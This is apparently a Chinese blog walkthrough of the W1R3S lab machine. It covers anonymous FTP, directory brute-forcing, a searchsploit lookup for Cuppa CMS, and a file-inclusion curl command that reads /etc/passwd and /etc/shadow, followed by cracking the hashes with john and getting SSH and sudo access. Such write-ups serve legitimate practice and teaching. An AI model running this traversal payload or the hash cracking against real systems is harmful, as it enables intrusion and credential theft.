W1R3S
打靶
ftp服务器一般就是这个默认的匿名登陆,你既然开了就要传文件的,这样肯定更方便一些,就尝试一下
ftp 192.168.240.129
输入anonymous回车登录
1 | binary |
md5在线解密 https://www.somd5.com/
https://www.upsidedowntext.com/
目录爆破
目测是网站建设页面被暴露,并且权限都为yes,可以作为攻击点,继续深入
那就进去 看看有没有可以上传shell的地方
不是root权限 找找这个Cuppa CMS 有什么漏洞先
搜一下有什么漏洞
1 | searchsploit cuppa cms |
1 | searchsploit cuppa -m 25971 |
通过 $_REQUEST["urlConfig"]
参数包含的远程 URL 或者文件路径,可以导致服务器执行包含的 PHP 代码或读取非 PHP 文件内容。
1 | http://192.168.110.145/administrator/alerts/alertConfigField.php |
看到已经列出了passwd的内容,每一条用户数据的第二段都是X,证明密码是以哈希的方式存在了shadow文件中,我们去找shadow文件。
shadow文件用于存放密码。
1 | curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.110.145/administrator/alerts/alertConfigField.php |
可以拿下,这样我们就可以去破解。我们把三个用户密码保存,使用john破解。
vim shadow.h
1 |
|
john hash.txt
ssh
id后可以看到拥有27sudo的权限
用户有三个all权限
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 jaytp@qq.com